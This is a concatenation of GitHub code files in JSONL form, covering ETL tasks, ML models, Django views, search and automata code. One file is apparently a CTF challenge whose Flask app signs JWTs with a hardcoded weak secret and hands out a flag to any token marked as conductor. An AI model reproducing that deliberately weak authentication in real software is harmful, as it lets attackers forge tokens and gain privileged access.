input\n while True:\n card = get_int(\"Number: \")\n if card > 0:\n break\n\n # help vaiables\n counter, numbers, help1, befor_last, last = 0, 0, 0, 0, 0\n temp = card\n # to change once multuply and once not\n x = False\n # do throught each number\n while temp > 0:\n numbers += 1\n if temp < 100 and temp > 9:\n befor_last = temp % 10\n\n elif temp < 10 and temp >= 0:\n last = temp\n # divide to go to the second number\n help1 = temp % 10\n temp = math.trunc(temp / 10)\n if x:\n help1 *= 2\n if help1 > 9:\n help1 -= 9\n\n counter += help1\n\n else:\n counter += help1\n\n x = not x\n # if the card is real find which company\n if counter % 10 == 0:\n if numbers == 15 and last == 3 and (befor_last == 4 or befor_last == 7):\n print(\"AMEX\")\n\n elif (numbers == 16 or numbers == 13) and last == 4:\n print(\"VISA\")\n\n elif numbers == 16 and last == 5 and (befor_last == 1 or befor_last == 2 or befor_last == 3 or befor_last == 4 or befor_last == 5):\n print(\"MASTERCARD\")\n\n else:\n print(\"INVALID\")\n\n else:\n print(\"INVALID\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"imadham/cs50","sub_path":"pset6/credit/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34218228783","text":"from openpyxl import workbook\nfrom openpyxl import load_workbook\nfrom openpyxl import worksheet\nfrom openpyxl.cell import Cell\n\nTITLE_COLUMN = 5\nID_COLUMN = 1\nSTATUS_COLUMN = 3\nVERSION_COLUMN = 8\n\n\ndef find_in_file(file_name, text):\n\n wb = load_workbook(file_name)\n # 只支持第一sheet\n ws = wb.active\n for row_no in range(1, ws.max_row + 1):\n cell = ws.cell(row=row_no, column=TITLE_COLUMN)\n if cell.data_type == Cell.TYPE_STRING and cell.value.find(text) > 0:\n return [\n ws.cell(row=cell.row, column=ID_COLUMN).value,\n ws.cell(row=cell.row, column=STATUS_COLUMN).value,\n ws.cell(row=cell.row, column=VERSION_COLUMN).value\n ]\n\n\ncollection_book = 
load_workbook('collection.xlsx')\n\ncollection_sheet = collection_book.active\n\nfor row_num in range(1, collection_sheet.max_row + 1):\n substring = collection_sheet.cell(row=row_num, column=9).value[-10:-3]\n result = find_in_file(\"issues.xlsx\", substring)\n if result is not None:\n collection_sheet.cell(row=row_num, column=20).value = result[0]\n collection_sheet.cell(row=row_num, column=20).hyperlink =\\\n \"http://10.199.129.57/redmine/issues/{}\".format(result[0])\n collection_sheet.cell(row=row_num, column=21).value = result[1]\n collection_sheet.cell(row=row_num, column=22).value = result[2]\n\ncollection_book.save('collection.xlsx')\n","repo_name":"ushisoft/pizza","sub_path":"findinsheet.py","file_name":"findinsheet.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31848322646","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import home,login,register,addissues,myissues,resolverlogin,employeeregister\n \n\n\nurlpatterns = [\n path('', home.Index.as_view(),name='homepage'),\n path('login',login.Login.as_view(),name='login'),\n path('register',register.Register.as_view(),name='register'),\n path('addissues',addissues.Addissues.as_view(),name='addissues'),\n path('logout/',login.logout,name='logout'),\n path('myissues', myissues.Myissues.as_view() ,name='myissues'),\n path('resolverlogin', resolverlogin.Resolverlogin.as_view() ,name='resolverlogin'),\n path('employeeregister', employeeregister.Employeeregister.as_view() ,name='employeeregister'),\n\n\n # path('cart',cart.Cart.as_view(),name='cart'),\n # path('check_out',auth_middleware(check_out.CheckOut.as_view()),name='check_out'),\n # path('orders',auth_middleware(orders.OrderView.as_view()),name='orders'),\n # path('seller',seller.Seller.as_view(),name='seller'),\n\n \n]\n","repo_name":"Archana-9/Devathon22-Team102-PS05","sub_path":"Issue_Resolver/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3580697","text":"import heapq as hq\nfrom config import *\nfrom utility import *\n# linked node to connect node with its parent and remember pos\nclass Node:\n def __init__(self, parent, pos):\n self.pos = pos\n self.prev = parent\n\n# Astar planning\ndef astar(start, goal, distMethod, expandMethod, robot, env):\n\n # Init\n # print 'Planning Query: from %s to %s'%(str(start),str(goal))\n prevKey = getKey(start)\n h = { prevKey:heuristic(start, goal, distMethod) }\n g = { prevKey:0 }\n frontiers = [ (h[prevKey]*H_PRIOR+g[prevKey], Node(None, np.array(start))) ]\n goalNode = None; explored = []; collided = [];\n it = 0\n\n # Astar main loop\n while len(frontiers)!=0 and it<MAX_ITER:\n\n # Goal Test\n # percent = float(100*it)/MAX_ITER\n # print '{0}\\r'.format('|' * int(percent+1) + '%s'%str(percent) + '%'),\n node = hq.heappop(frontiers)[1]\n prevKey = getKey(node.pos)\n explored.append(node.pos)\n if goaltest(node.pos, goal, distMethod):\n goalNode = node\n break\n\n # Expand successor\n for point in expandMethod(node.pos):\n key = getKey(point)\n step_cost = heuristic(point, node.pos, distMethod)\n if (key in g) and (g[key]<=g[prevKey]+step_cost):\n continue\n if isCollided(point, robot, env):\n collided.append(point)\n continue\n h[key] = heuristic(point, goal, distMethod)\n g[key] = g[prevKey] + step_cost\n hq.heappush(frontiers, (h[key]*H_PRIOR+g[key], 
Node(node, point)))\n it += 1\n #try: \n # print '\\r{0}'.format(' '*120) + '\\rOptimization: %s'%(str( g[prevKey]))\n # print 'Iteration: ' + '|' * int(percent+1) + '%s'%str(percent) + '%'\n #except:\n #pass\n #finally:\n return goalNode, explored, collided\n\n# Anastar cost\ndef getCost(G, g, h):\n return (G-g)/h\n\n# Goal test\ndef goaltest(pos, goal, distMethod):\n return heuristic(pos, goal, distMethod) < MAX_ERR\n\n# Heuristic loss\ndef heuristic(pos1, pos2, distMethod):\n return distMethod(pos1, pos2)\n\n# Collision test\ndef isCollided(pos, robot, env):\n robot.SetActiveDOFValues(pos)\n for i,body in enumerate(env.GetBodies()):\n if env.CheckCollision(robot, body):\n return True\n return False\n","repo_name":"uniericuni/Robot-Team","sub_path":"planning.py","file_name":"planning.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12007165099","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nfrom LinearTriangulation import *\nfrom Helper.ImageHelper import *\n\nclass Disambiguate():\n def __init__(self, inliers, K) -> None:\n self.inliers = inliers\n self.K = K\n\n def chiralityCheck(self, X, R, C):\n count = 0\n r3 = R[2]\n for x in X:\n # pry()\n if(np.dot(r3, x-C).any())>0:\n count += 1\n return count\n\n def disambiguateCameraPose(self,C2, R2, P1,K):\n '''\n Inputs:\n C2\n R2\n P1\n K\n '''\n\n # find the maximum number of points in both\n # camera poses\n # the one with max points is the correct answer\n maxCount = 0\n plotHelper = Plot()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n x1 = self.inliers[:, 0:2]\n x2 = self.inliers[:, 2:4]\n bestX, bestC, bestR = None, None, None\n # linTriangle = LinearTriangulation(self.K)\n index = 0\n for r2, c2 in zip(R2, C2):\n c2 = c2.reshape((3, 1))\n X2 = LinearTrinagulation(P1, c2, r2, K,x1, x2)\n # X2 = linTriangle.LinearTriangulation(C1, R1, c2, r2, x1, x2)\n # pry()\n count = self.chiralityCheck(X2, r2, c2)\n plotHelper.plotTriangle(X2, c2, r2, index)\n if count > maxCount:\n print(count)\n maxCount = count\n bestR = r2\n bestC = c2\n bestX = X2\n i = index\n index += 1\n # print(\"Found best x\")\n\n plt.xlim(-5, 5)\n plt.ylim(-5, 5)\n # plt.show()\n\n # fig = plt.figure()\n # ax = fig.add_subplot(111)\n # plotHelper.plotTriangle(bestX, bestC, bestR, i)\n # plt.xlim(-5, 5)\n # plt.ylim(-5, 5)\n # # plt.show()\n\n return bestX, bestC, bestR, i\n","repo_name":"zen1405/Nerf-SFM-P3","sub_path":"Phase1/DisambiguateCameraPose.py","file_name":"DisambiguateCameraPose.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24217656222","text":"from datetime import timedelta\nfrom prefect import task\nfrom prefect.tasks import task_input_hash\nfrom pipelines import Pipeline\n\nimport pandas as pd\nfrom pandas import DataFrame, read_csv\nfrom pandas.io.parsers import TextFileReader\n\nimport pathlib\nimport os\nimport json\n\nfrom prefect_gcp.cloud_storage import GcsBucket\n\nfrom prefect_gcp import GcpCredentials\n\n\n@task(\n log_prints=True,\n retries=3,\n cache_key_fn=task_input_hash,\n cache_expiration=timedelta(days=1),\n)\ndef extract_data(p: Pipeline):\n # print(\"Extracting Data...\")\n return p.fetch_data()\n\n\n@task(\n # cache_key_fn=task_input_hash,\n # cache_expiration=timedelta(days=1),\n)\ndef fetch_chunks(filepath: str, chunk_size: int):\n return read_csv(filepath, iterator=True, 
chunksize=chunk_size)\n\n\n@task(\n log_prints=True,\n retries=3,\n cache_key_fn=task_input_hash,\n cache_expiration=timedelta(days=1),\n)\ndef transform_data(p: Pipeline, chunk: DataFrame):\n return p.data_transform(chunk)\n\n\n@task(\n log_prints=True,\n retries=3,\n cache_key_fn=task_input_hash,\n cache_expiration=timedelta(days=1),\n)\ndef insert_data(p: Pipeline, chunk: DataFrame):\n p.insert_rows(chunk)\n\n\n@task(\n log_prints=True,\n retries=3,\n cache_key_fn=task_input_hash,\n cache_expiration=timedelta(days=1),\n)\ndef create_table(p: Pipeline, chunk: DataFrame):\n p.create_table(chunk)\n\n\n# ---------- GCP Code -------------------------\n@task(retries=3)\ndef fetch(url: str) -> DataFrame:\n return pd.read_csv(url)\n\n\n@task(log_prints=True)\ndef clean(df: DataFrame) -> DataFrame:\n # Make columns lowercase\n df.columns = [str(column).lower() for column in df.columns]\n\n # Convert string datetime into pandas datetime\n if \"tpep_pickup_datetime\" in df.columns:\n df.tpep_pickup_datetime = pd.to_datetime(df.tpep_pickup_datetime)\n\n if \"tpep_dropoff_datetime\" in df.columns:\n df.tpep_dropoff_datetime = pd.to_datetime(df.tpep_dropoff_datetime)\n\n if \"lpep_pickup_datetime\" in df.columns:\n df.lpep_pickup_datetime = pd.to_datetime(df.lpep_pickup_datetime)\n\n if \"lpep_dropoff_datetime\" in df.columns:\n df.lpep_dropoff_datetime = pd.to_datetime(df.lpep_dropoff_datetime)\n\n # Filter data of trips that has zero passengers\n # df = df[df[\"passenger_count\"] != 0]\n\n return df\n\n\n@task\ndef write_parquet_file(df: DataFrame, filename: str) -> pathlib.Path:\n path = pathlib.Path(f\"data/{filename}.parquet\")\n if not os.path.exists(\"data\"):\n os.makedirs(\"data/\")\n df.to_parquet(path=path, compression=\"gzip\")\n return path\n\n\n@task(retries=3)\ndef write_to_gcs(source: str, destination: str) -> None:\n gcs_block = GcsBucket.load(\"gcs-data-store\")\n gcs_block.upload_from_path(from_path=source, to_path=destination) # type: ignore typing does not work for this library\n\n\n@task(retries=3)\ndef extract_from_gcs(path: str) -> pathlib.Path:\n # Get data from gcs and write to local filesystem\n dest = \"./gcp\"\n gcs_block = GcsBucket.load(\"gcs-data-store\")\n gcs_block.get_directory(from_path=path, local_path=dest) # type: ignore\n return pathlib.Path(f\"{dest}/{path}\")\n\n\n@task\ndef create_schema_json(df: DataFrame, color: str, year: int, month: int):\n schema: dict = pd.io.json.build_table_schema(df) # type: ignore\n if not os.path.exists(\"./schema\"):\n os.makedirs(\"schema/\")\n open(f\"./schema/{color}_tripdata_{year}-{month:02}.json\", \"w+\").write(\n json.dumps(schema)\n )\n\n\n@task(log_prints=True)\ndef transform_gcs_data(path: pathlib.Path) -> DataFrame:\n df = pd.read_parquet(path)\n print(f\"*************** {df.shape[0]} \")\n # print(\n # f\"before replacement: number of zero passenger trips: {df['passenger_count'].isna().sum()}\"\n # )\n # df[\"passenger_count\"].fillna(0, inplace=True) # replace 0 values with NA\n # print(\n # f\"after after replacement: number of zero passenger trips: {df['passenger_count'].isna().sum()}\"\n # )\n return df\n\n\n@task\ndef upload_to_bq(df: DataFrame, color: str) -> None:\n gcp_credentials_block = GcpCredentials.load(\"service-account-cred\")\n df.to_gbq(\n destination_table=f\"de_zoomcamp_dataset.{color}_taxi_data\",\n project_id=\"de-zoomcamp-376020\",\n credentials=gcp_credentials_block.get_credentials_from_service_account(), # type: ignore\n chunksize=10_000,\n if_exists=\"append\",\n 
)\n","repo_name":"vuvuzella/de_zoomcamp_2023","sub_path":"week_2/application/etl_project/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37701289207","text":"from flask import Flask, request, render_template, url_for, make_response\nimport json, jwt, time, os, random, sqlite3\n\napp = Flask(\n __name__, \n template_folder=\"templates\",\n static_folder=\"static\",\n static_url_path=\"\"\n )\nkey = \"mylittlesecret\"\n\n\n@app.route(\"/get_ticket\", methods=['GET'])\ndef get_token():\n sesh_token = jwt.encode({'conductor': False, 'now': time.time()}, key, algorithm='HS256')\n #r = make_response(render_template(\"ticket.html\", token=sesh_token.decode(\"utf-8\")))\n r = make_response(render_template(\"ticket.html\", token=sesh_token))\n r.set_cookie('jwt', sesh_token)\n return r\n\n\n@app.route(\"/conductor_seat\", methods=['POST', 'GET'])\ndef get_flag():\n try:\n payload = jwt.decode(request.cookies.get('jwt'), key, algorithms=['HS256'])\n if payload['conductor']:\n return render_template(\"conductor.html\", flag=\"pecan{bRu73f0rc3-w34k-K3yz}\")\n else:\n return render_template(\"bruh.html\", image=\"angry.gif\", msg=\"Hey! You aren't the train conductor!\")\n except:\n return render_template(\"bruh.html\", msg=\":^(\")\n\n\n@app.route(\"/train\", methods=['GET'])\ndef train():\n try:\n if 'jwt' in request.cookies:\n return render_template(\"train.html\")\n else:\n return render_template(\"bruh.html\", msg=\"You need a ticket to get on the train!\")\n except:\n return render_template(\"bruh.html\", msg=\":^(\")\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef main():\n con = sqlite3.connect(\"hints.db\")\n con.row_factory = sqlite3.Row\n c = con.cursor()\n c.execute(\"SELECT hint from hints ORDER BY RANDOM() LIMIT 1;\")\n out = c.fetchall()\n if request.method == \"POST\":\n return render_template(\"index.html\", hint=out)\n else:\n return render_template(\"index.html\")\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n\n\n","repo_name":"ECUComputingAndSecurity/PeCanCTF-2022-Public","sub_path":"web/tickets-please/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10598802234","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 29 09:16:36 2021\r\n\r\n@author: rohin\r\n\"\"\"\r\n\r\nfrom numpy import mean\r\nfrom numpy import std\r\nfrom matplotlib import pyplot\r\nfrom sklearn.model_selection import KFold\r\n#from keras.datasets import mnist\r\n#from keras.utils import to_categorical\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Flatten\r\nfrom keras.optimizers import SGD\r\n#from cpar.digit import load_data\r\nimport gzip\r\nimport os\r\nfrom urllib.request import urlretrieve\r\n\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\n\r\n\r\nBASE_URL = \"https://cpar.s3.amazonaws.com/\"\r\n\r\n\r\ndef download_from_s3(file_name):\r\n \r\n download_url = BASE_URL + file_name\r\n save_path = os.path.join('data', file_name)\r\n urlretrieve(download_url, save_path)\r\n\r\ndef load_data(path=None):\r\n \"\"\"Loads the cpar-char dataset.\r\n # Returns\r\n Tuple of Numpy arrays: `(trainX, trainY), (testX, testY)`.\r\n \"\"\"\r\n files = 
['digit_train-labels-idx1-ubyte.gz', 'digit_train-images-idx3-ubyte.gz',\r\n             'digit_test-labels-idx1-ubyte.gz', 'digit_test-images-idx3-ubyte.gz']\r\n\r\n    paths = []\r\n    if path is None:\r\n        if os.path.isdir('data') is not True:\r\n            os.mkdir('data')\r\n        for fname in tqdm(files):\r\n            if os.path.exists(os.path.join('data', fname)) is False:\r\n                download_from_s3(fname)\r\n            paths.append(fname)\r\n\r\n    with gzip.open(os.path.join('data', paths[0]), 'rb') as lbpath:\r\n        trainY = np.frombuffer(lbpath.read(), np.uint8, offset=8)\r\n\r\n    with gzip.open(os.path.join('data', paths[1]), 'rb') as imgpath:\r\n        trainX = np.frombuffer(imgpath.read(), np.uint8, offset=16).reshape(len(trainY), 28, 28)\r\n\r\n    with gzip.open(os.path.join('data', paths[2]), 'rb') as lbpath:\r\n        testY = np.frombuffer(lbpath.read(), np.uint8, offset=8)\r\n\r\n    with gzip.open(os.path.join('data', paths[3]), 'rb') as imgpath:\r\n        testX = np.frombuffer(imgpath.read(), np.uint8, offset=16).reshape(len(testY), 28, 28)\r\n\r\n    return (trainX, trainY), (testX, testY)\r\n\r\n# scale pixels\r\ndef prep_pixels(train, test):\r\n\t# convert from integers to floats\r\n\ttrain_norm = train.astype('float32')\r\n\ttest_norm = test.astype('float32')\r\n\t# normalize to range 0-1\r\n\ttrain_norm = train_norm / 255.0\r\n\ttest_norm = test_norm / 255.0\r\n\t# return normalized images\r\n\treturn train_norm, test_norm\r\n\r\n# define cnn model\r\ndef define_model():\r\n\tmodel = Sequential()\r\n\t# 28x28 single-channel input matches the arrays produced by load_data (was 32x32)\r\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', input_shape=(28, 28, 1)))\r\n\tmodel.add(MaxPooling2D((2, 2)))\r\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform'))\r\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform'))\r\n\tmodel.add(MaxPooling2D((2, 2)))\r\n\tmodel.add(Flatten())\r\n\tmodel.add(Dense(100, activation='relu', kernel_initializer='he_uniform'))\r\n\tmodel.add(Dense(10, activation='softmax'))\r\n\t# compile model\r\n\topt = SGD(lr=0.01, momentum=0.9)\r\n\tmodel.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\r\n\treturn model\r\n\r\n\r\n# evaluate a model using k-fold cross-validation\r\ndef evaluate_model(dataX, dataY, n_folds=5):\r\n\tscores, histories = list(), list()\r\n\t# prepare cross validation\r\n\tkfold = KFold(n_folds, shuffle=True, random_state=1)\r\n\t# enumerate splits\r\n\tfor train_ix, test_ix in kfold.split(dataX):\r\n\t\t# define model\r\n\t\tmodel = define_model()\r\n\t\t# select rows for train and test\r\n\t\ttrainX, trainY, testX, testY = dataX[train_ix], dataY[train_ix], dataX[test_ix], dataY[test_ix]\r\n\t\t# fit model\r\n\t\thistory = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)\r\n\t\t# evaluate model\r\n\t\t_, acc = model.evaluate(testX, testY, verbose=0)\r\n\t\tprint('> %.3f' % (acc * 100.0))\r\n\t\t# stores scores\r\n\t\tscores.append(acc)\r\n\t\thistories.append(history)\r\n\treturn scores, histories\r\n\r\n# plot diagnostic learning curves\r\ndef summarize_diagnostics(histories):\r\n\tfor i in range(len(histories)):\r\n\t\t# plot loss\r\n\t\tpyplot.subplot(2, 1, 1)\r\n\t\tpyplot.title('Cross Entropy Loss')\r\n\t\tpyplot.plot(histories[i].history['loss'], color='blue', label='train')\r\n\t\tpyplot.plot(histories[i].history['val_loss'], color='orange', label='test')\r\n\t\t# plot accuracy\r\n\t\tpyplot.subplot(2, 1, 2)\r\n\t\tpyplot.title('Classification Accuracy')\r\n\t\tpyplot.plot(histories[i].history['accuracy'], color='blue', 
label='train')\r\n\t\tpyplot.plot(histories[i].history['val_accuracy'], color='orange', label='test')\r\n\tpyplot.show()\r\n\r\n# summarize model performance\r\ndef summarize_performance(scores):\r\n\t# print summary\r\n\tprint('Accuracy: mean=%.3f std=%.3f, n=%d' % (mean(scores)*100, std(scores)*100, len(scores)))\r\n\t# box and whisker plots of results\r\n\tpyplot.boxplot(scores)\r\n\tpyplot.show()\r\n\r\n# run the test harness for evaluating a model\r\ndef run_test_harness():\r\n\t# load dataset (load_data returns two (X, Y) tuples, not a flat 4-tuple)\r\n\t(trainX, trainY), (testX, testY) = load_data()\r\n\t# add a channel axis and one-hot encode labels for categorical_crossentropy\r\n\tfrom keras.utils import to_categorical  # the top-level import is commented out above\r\n\ttrainX = trainX.reshape((trainX.shape[0], 28, 28, 1))\r\n\ttestX = testX.reshape((testX.shape[0], 28, 28, 1))\r\n\ttrainY = to_categorical(trainY)\r\n\ttestY = to_categorical(testY)\r\n\t# prepare pixel data\r\n\ttrainX, testX = prep_pixels(trainX, testX)\r\n\t# evaluate model\r\n\tscores, histories = evaluate_model(trainX, trainY)\r\n\t# learning curves\r\n\tsummarize_diagnostics(histories)\r\n\t# summarize estimated performance\r\n\tsummarize_performance(scores)\r\n\r\n# entry point, run the test harness\r\nrun_test_harness()","repo_name":"aldebaran-alpha-tauri/MNIST-digit-detection","sub_path":"base_model_hindi_digits.py","file_name":"base_model_hindi_digits.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"19582514537","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\n\nfrom .models import *\nfrom .forms import TaskForm\n# Create your views here.\n\ndef index(request):\n    tasks = Task.objects.all()\n    form = TaskForm()\n\n    # save logic\n    if request.method=='POST':\n        form = TaskForm(request.POST)\n        if form.is_valid():\n            form.save()\n            return redirect('/')\n\n    isi = {\n        'tasks' : tasks,\n        'form' : form,\n    }\n    return render(request, 'tasks/list.html', isi)\n\ndef update(request, pk):\n    tasks = Task.objects.get(id=pk)\n    form = TaskForm(instance=tasks)\n\n    # update logic\n    if request.method == 'POST':\n        form = TaskForm(request.POST, instance=tasks)\n        if form.is_valid():\n            form.save()\n            return redirect('/')\n\n    isi = {\n        'form' : form\n    }\n    return render(request, 'tasks/update_task.html', isi)\n\ndef deleteItem(request, pk):\n    item = Task.objects.get(id=pk)\n\n    # delete logic\n    if request.method == 'POST':\n        item.delete()\n        return redirect('/')\n\n    isi = {\n        'item' : item,\n    }\n    return render(request, 'tasks/delete_task.html', isi)","repo_name":"willianrefky/Todo","sub_path":"django-project/tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"38741722024","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom nystrom_attention import Nystromformer\n\nclass TransLayer(nn.Module):\n    def __init__(self, dim=512, heads=8, depth=1):\n        super(TransLayer, self).__init__()\n        self.trans = Nystromformer(\n            dim = dim,\n            dim_head = dim//heads,\n            heads = heads,\n            depth = depth,\n            num_landmarks = dim//2,  # number of landmarks\n            pinv_iterations = 6,  # number of moore-penrose iterations for approximating pinverse. 6 was recommended by the paper\n            attn_values_residual = True,  # whether to do an extra residual with the value or not. supposedly faster convergence if turned on\n            attn_dropout = 0.1,\n            ff_dropout = 0.1\n        )\n\n    def forward(self, x):\n        x = self.trans(x)\n        return x\n\nclass TransAtt(nn.Module):\n    def __init__(self, num_classes, width, depth, heads):\n        print('depth: {}, width: {}, heads: {}'.format(depth, width, heads))\n        super(TransAtt, self).__init__()\n        self.num_classes = num_classes\n        self._fc1 = nn.Sequential(nn.Linear(1024, width), nn.ReLU())\n        self.trans_layer = TransLayer(dim = width, heads = heads, depth = depth)\n        self.attention = nn.Sequential(nn.Linear(width, width//4), nn.Tanh(), nn.Linear(width//4, 1))\n        self._fc2 = nn.Linear(width, self.num_classes)\n\n    def forward(self, x, **kwargs):\n        x = self._fc1(x) #[B, n, width]\n\n        # Translayer\n        y = self.trans_layer(x)\n\n        # Attention pooling\n        a = self.attention(y) # [B,n,1]\n        a = a.transpose(1, 2) # [B,n,1] -> [B,1,n]\n        a = F.softmax(a, dim=2) # [B,1,n]\n        z = torch.bmm(a, y).squeeze(1) # [B,1,n]*[B,n,width]=[B,1,width] -> [B,width]\n\n        # Predict\n        logits = self._fc2(z) #[B, num_classes]\n        Y_hat = torch.argmax(logits, dim=1)\n        Y_prob = F.softmax(logits, dim=1)\n        results_dict = {'logits': logits, 'Y_prob': Y_prob, 'Y_hat': Y_hat, 'Attention': a}\n        return results_dict
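\n\n# Minimal usage sketch (hypothetical shapes): score one bag of 500 patch features,\n# each of dimension 1024, with a 2-class head; shapes follow the comments in forward().\nif __name__ == '__main__':\n    model = TransAtt(num_classes=2, width=512, depth=2, heads=8)\n    bag = torch.randn(1, 500, 1024)  # [B, n, 1024]\n    out = model(bag)\n    print(out['logits'].shape, out['Attention'].shape)  # [1, 2] and [1, 1, 500]\n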
","repo_name":"RuixiangZhao/WSI_classification_baseline","sub_path":"models/trans_att.py","file_name":"trans_att.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"32301542007","text":"\nimport copy\nimport wfa.nfa as nfa\nimport wfa.matrix_wfa as matrix_wfa\nimport wfa.core_wfa as core_wfa\nimport wfa.nfa_export as nfa_export\nimport collections\n\nDIRECTORY = \"subautomata\"\nSL_AUT_FILE = \"pa_loop_aut\"\nSL_CLOSURE_FILE = \"pa_loop_closure\"\nCLOSURE_MODE = matrix_wfa.ClosureMode.inverse\nITERATIONS = 100\nMAX_STATES = 40\n\n\"\"\"Wrapper for storing a WFA, initial, final vectors, and a transition closure.\n\"\"\"\nWFAReachabilityWrap = collections.namedtuple('WFAReachabilityWrap', ['wfa', 'ini_vec', 'fin_vec', 'closure'])\n\nclass ApproxNFAReach(object):\n\n    # pylint: disable=too-many-instance-attributes\n\n    def __init__(self, pa, fa):\n        \"\"\"Set input PA and NFA and initialize state weights.\n\n        Keyword arguments:\n        pa -- PA as an input for a reduction\n        fa -- NFA as an input for a reduction\n        \"\"\"\n        self._pa = pa\n        self._pa.__class__ = matrix_wfa.MatrixWFA\n        self._nfa = fa\n        self._nfa.__class__ = nfa.NFA\n\n        self._language_sum = {}\n        self._reachable_states = {}\n        self._nfa_tr_dict = {}\n        self._pa_tr_dict = {}\n        self._sl_automata = {}\n        self._sl_closure = {}\n\n    def get_language_sum(self):\n        \"\"\"Get the language labels.\n\n        Return: Dictionary: State (NFA) -> (Dictionary: State (PA) -> Float (weight))\n        \"\"\"\n        return self._language_sum\n\n    def prepare(self):\n        \"\"\"Initialize values for a new computation of the state labels.\n        \"\"\"\n        self._language_sum = {}\n        self._reachable_states = {}\n        for state in self._nfa.get_states():\n            self._language_sum[state] = 0\n        self._nfa_tr_dict = self._nfa.get_dictionary_transitions()\n        self._pa_tr_dict = self._pa.get_dictionary_transitions()\n\n    def _get_pa_states_reachability(self, reach_wrap, lang_aggr, lang_weight):\n        \"\"\"Compute new PA state labels from the transition closure, initial and\n        final vectors.\n\n        Return: (Float(Language weight), Dictionary: State(PA) -> Float(State Label, weight))\n        Keyword arguments:\n        reach_wrap -- Type WFAReachabilityWrap. 
Automata reachability information\n (an initial, final weights, and a transition closure)\n lang_aggr -- Current value of the PA state labels.\n lang_weight -- Current state label of the NFA state (beta function).\n \"\"\"\n if len(lang_aggr) < len(self._pa.get_states()):\n for pa_state in self._pa.get_states():\n lang_aggr[pa_state] = 0.0\n\n for old, new in reach_wrap.wfa.get_rename_dict().iteritems():\n if new not in reach_wrap.wfa.get_starts():\n continue\n for old1, new1 in reach_wrap.wfa.get_rename_dict().iteritems():\n lang_aggr[old1[0]] += reach_wrap.ini_vec[0,old[0]] * reach_wrap.closure[new, new1] * reach_wrap.fin_vec[0,new1]\n lang_weight += reach_wrap.ini_vec[0,old[0]] * reach_wrap.closure[new, new1] * reach_wrap.fin_vec[0,new1]\n return (lang_weight, lang_aggr)\n\n def _get_back_nfa(self, state, max_states=None):\n \"\"\"Get backward NFA to a given state (and perform disambiguation if\n necessary). If a size of the automaton is greater than max_states,\n None is returned.\n\n Return: unambiguous NFA or None (if the automaton is too big)\n Keyword arguments:\n state -- State of the NFA to obtain the backward automaton.\n max_states -- Maximum number of states of the back NFA.\n \"\"\"\n nfa_back = self._nfa.get_backward_nfa(state).get_trim_automaton()\n nfa_back.__class__ = nfa.NFA\n if (max_states is not None) and (len(nfa_back.get_states()) > max_states):\n return None\n if not nfa_back.is_unambiguous():\n nfa_back = nfa_back.get_unambiguous_nfa(max_states)\n if nfa_back is not None:\n nfa_back = nfa_back.get_trim_automaton()\n return nfa_back\n\n def process_branch_state(self, state, predecessors):\n \"\"\"Compute approximate state labels of the PA for a state state of the NFA.\n It is assumed that the state state has no self-loop (self-loops are\n ignored).\n\n Keyword arguments:\n state -- State of the NFA.\n predecessors -- List of predecessors of the state state.\n \"\"\"\n lang_aggr = {}\n lang_weight = 0.0\n\n for pa_state in self._pa.get_states():\n lang_aggr[pa_state] = 0.0\n\n for act_pred in predecessors:\n if act_pred == state:\n continue\n\n #Get all transitions from actual predessors\n #rest_nfa_trans = []\n symbols = set([])\n for transition in self._nfa_tr_dict[act_pred]:\n if transition.dest == state:\n #rest_nfa_trans.append(transition)\n symbols.add(transition.symbol)\n # trans_nfa = nfa.NFA(rest_nfa_trans, {state: 1.0}, {act_pred: 1.0})\n #\n # pa_ini_states = self._reachable_states[act_pred] #{k:v for k, v in self._reachable_states[act_pred]}\n # pa_copy = copy.copy(self._pa)\n # pa_copy.set_starts(pa_ini_states)\n\n\n\n #Product of the PA and predecessors automaton\n # spa = 